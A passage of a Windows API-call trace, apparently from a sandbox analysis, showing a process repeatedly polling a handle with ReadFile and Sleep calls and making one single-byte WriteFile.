	[0189.743] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.743] GetLastError () returned 0x218
	[0189.744] Sleep (dwMilliseconds=0xa) 
	[0189.761] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.761] GetLastError () returned 0x218
	[0189.761] Sleep (dwMilliseconds=0xa) 
	[0189.775] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.775] GetLastError () returned 0x218
	[0189.775] Sleep (dwMilliseconds=0xa) 
	[0189.790] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.790] GetLastError () returned 0x218
	[0189.791] Sleep (dwMilliseconds=0xa) 
	[0189.806] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.806] GetLastError () returned 0x218
	[0189.806] Sleep (dwMilliseconds=0xa) 
	[0189.821] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.822] GetLastError () returned 0x218
	[0189.822] Sleep (dwMilliseconds=0xa) 
	[0189.839] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.839] GetLastError () returned 0x218
	[0189.839] Sleep (dwMilliseconds=0xa) 
	[0189.853] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.853] GetLastError () returned 0x218
	[0189.853] Sleep (dwMilliseconds=0xa) 
	[0189.869] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.869] GetLastError () returned 0x218
	[0189.869] Sleep (dwMilliseconds=0xa) 
	[0189.885] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.885] GetLastError () returned 0x218
	[0189.885] Sleep (dwMilliseconds=0xa) 
	[0189.900] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.900] GetLastError () returned 0x218
	[0189.900] Sleep (dwMilliseconds=0xa) 
	[0189.916] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.916] GetLastError () returned 0x218
	[0189.916] Sleep (dwMilliseconds=0xa) 
	[0189.947] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.947] GetLastError () returned 0x218
	[0189.947] Sleep (dwMilliseconds=0xa) 
	[0189.962] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.962] GetLastError () returned 0x218
	[0189.962] Sleep (dwMilliseconds=0xa) 
	[0189.978] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.978] GetLastError () returned 0x218
	[0189.978] Sleep (dwMilliseconds=0xa) 
	[0189.993] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0189.993] GetLastError () returned 0x218
	[0189.993] Sleep (dwMilliseconds=0xa) 
	[0190.009] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.009] GetLastError () returned 0x218
	[0190.009] Sleep (dwMilliseconds=0xa) 
	[0190.025] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.025] GetLastError () returned 0x218
	[0190.026] Sleep (dwMilliseconds=0xa) 
	[0190.040] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.040] GetLastError () returned 0x218
	[0190.040] Sleep (dwMilliseconds=0xa) 
	[0190.055] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.056] GetLastError () returned 0x218
	[0190.056] Sleep (dwMilliseconds=0xa) 
	[0190.071] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.071] GetLastError () returned 0x218
	[0190.071] Sleep (dwMilliseconds=0xa) 
	[0190.089] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.089] GetLastError () returned 0x218
	[0190.089] Sleep (dwMilliseconds=0xa) 
	[0190.103] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.103] GetLastError () returned 0x218
	[0190.103] Sleep (dwMilliseconds=0xa) 
	[0190.118] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.118] GetLastError () returned 0x218
	[0190.118] Sleep (dwMilliseconds=0xa) 
	[0190.134] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.134] GetLastError () returned 0x218
	[0190.134] Sleep (dwMilliseconds=0xa) 
	[0190.149] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.149] GetLastError () returned 0x218
	[0190.150] Sleep (dwMilliseconds=0xa) 
	[0190.165] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.165] GetLastError () returned 0x218
	[0190.165] Sleep (dwMilliseconds=0xa) 
	[0190.180] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.180] GetLastError () returned 0x218
	[0190.181] Sleep (dwMilliseconds=0xa) 
	[0190.196] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.197] GetLastError () returned 0x218
	[0190.197] Sleep (dwMilliseconds=0xa) 
	[0190.215] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.215] GetLastError () returned 0x218
	[0190.215] Sleep (dwMilliseconds=0xa) 
	[0190.227] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.227] GetLastError () returned 0x218
	[0190.227] Sleep (dwMilliseconds=0xa) 
	[0190.243] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.243] GetLastError () returned 0x218
	[0190.243] Sleep (dwMilliseconds=0xa) 
	[0190.259] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0190.259] GetLastError () returned 0x218
	[0190.282] Sleep (dwMilliseconds=0x3e8) 
	[0191.678] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0191.678] Sleep (dwMilliseconds=0xa) 
	[0191.694] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.694] GetLastError () returned 0x218
	[0191.694] Sleep (dwMilliseconds=0xa) 
	[0191.713] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.713] GetLastError () returned 0x218
	[0191.713] Sleep (dwMilliseconds=0xa) 
	[0191.725] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.725] GetLastError () returned 0x218
	[0191.725] Sleep (dwMilliseconds=0xa) 
	[0191.741] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.741] GetLastError () returned 0x218
	[0191.741] Sleep (dwMilliseconds=0xa) 
	[0191.756] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.756] GetLastError () returned 0x218
	[0191.756] Sleep (dwMilliseconds=0xa) 
	[0191.772] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.772] GetLastError () returned 0x218
	[0191.772] Sleep (dwMilliseconds=0xa) 
	[0191.787] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.787] GetLastError () returned 0x218
	[0191.788] Sleep (dwMilliseconds=0xa) 
	[0191.803] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.803] GetLastError () returned 0x218
	[0191.803] Sleep (dwMilliseconds=0xa) 
	[0191.820] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.820] GetLastError () returned 0x218
	[0191.820] Sleep (dwMilliseconds=0xa) 
	[0191.834] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.834] GetLastError () returned 0x218
	[0191.834] Sleep (dwMilliseconds=0xa) 
	[0191.849] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.849] GetLastError () returned 0x218
	[0191.849] Sleep (dwMilliseconds=0xa) 
	[0191.865] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.865] GetLastError () returned 0x218
	[0191.865] Sleep (dwMilliseconds=0xa) 
	[0191.881] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.881] GetLastError () returned 0x218
	[0191.881] Sleep (dwMilliseconds=0xa) 
	[0191.897] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.897] GetLastError () returned 0x218
	[0191.897] Sleep (dwMilliseconds=0xa) 
	[0191.912] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.912] GetLastError () returned 0x218
	[0191.912] Sleep (dwMilliseconds=0xa) 
	[0191.928] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.928] GetLastError () returned 0x218
	[0191.928] Sleep (dwMilliseconds=0xa) 
	[0191.943] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.943] GetLastError () returned 0x218
	[0191.943] Sleep (dwMilliseconds=0xa) 
	[0191.959] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.959] GetLastError () returned 0x218
	[0191.959] Sleep (dwMilliseconds=0xa) 
	[0191.974] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.974] GetLastError () returned 0x218
	[0191.974] Sleep (dwMilliseconds=0xa) 
	[0191.990] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0191.990] GetLastError () returned 0x218
	[0191.990] Sleep (dwMilliseconds=0xa) 
	[0192.006] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.006] GetLastError () returned 0x218
	[0192.006] Sleep (dwMilliseconds=0xa) 
	[0192.021] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.021] GetLastError () returned 0x218
	[0192.021] Sleep (dwMilliseconds=0xa) 
	[0192.039] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.039] GetLastError () returned 0x218
	[0192.039] Sleep (dwMilliseconds=0xa) 
	[0192.052] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.052] GetLastError () returned 0x218
	[0192.052] Sleep (dwMilliseconds=0xa) 
	[0192.068] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.068] GetLastError () returned 0x218
	[0192.068] Sleep (dwMilliseconds=0xa) 
	[0192.106] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.106] GetLastError () returned 0x218
	[0192.106] Sleep (dwMilliseconds=0xa) 
	[0192.116] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.116] GetLastError () returned 0x218
	[0192.116] Sleep (dwMilliseconds=0xa) 
	[0192.130] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.130] GetLastError () returned 0x218
	[0192.130] Sleep (dwMilliseconds=0xa) 
	[0192.146] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.146] GetLastError () returned 0x218
	[0192.146] Sleep (dwMilliseconds=0xa) 
	[0192.161] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.161] GetLastError () returned 0x218
	[0192.161] Sleep (dwMilliseconds=0xa) 
	[0192.177] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.177] GetLastError () returned 0x218
	[0192.177] Sleep (dwMilliseconds=0xa) 
	[0192.193] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.193] GetLastError () returned 0x218
	[0192.193] Sleep (dwMilliseconds=0xa) 
	[0192.208] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.208] GetLastError () returned 0x218
	[0192.208] Sleep (dwMilliseconds=0xa) 
	[0192.225] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.225] GetLastError () returned 0x218
	[0192.225] Sleep (dwMilliseconds=0xa) 
	[0192.240] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.240] GetLastError () returned 0x218
	[0192.240] Sleep (dwMilliseconds=0xa) 
	[0192.256] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.256] GetLastError () returned 0x218
	[0192.256] Sleep (dwMilliseconds=0xa) 
	[0192.271] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.271] GetLastError () returned 0x218
	[0192.271] Sleep (dwMilliseconds=0xa) 
	[0192.287] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.287] GetLastError () returned 0x218
	[0192.287] Sleep (dwMilliseconds=0xa) 
	[0192.302] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.302] GetLastError () returned 0x218
	[0192.302] Sleep (dwMilliseconds=0xa) 
	[0192.318] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.318] GetLastError () returned 0x218
	[0192.318] Sleep (dwMilliseconds=0xa) 
	[0192.333] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.333] GetLastError () returned 0x218
	[0192.333] Sleep (dwMilliseconds=0xa) 
	[0192.349] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.349] GetLastError () returned 0x218
	[0192.349] Sleep (dwMilliseconds=0xa) 
	[0192.365] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.365] GetLastError () returned 0x218
	[0192.365] Sleep (dwMilliseconds=0xa) 
	[0192.380] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.380] GetLastError () returned 0x218
	[0192.380] Sleep (dwMilliseconds=0xa) 
	[0192.396] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.396] GetLastError () returned 0x218
	[0192.396] Sleep (dwMilliseconds=0xa) 
	[0192.411] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0192.411] GetLastError () returned 0x218
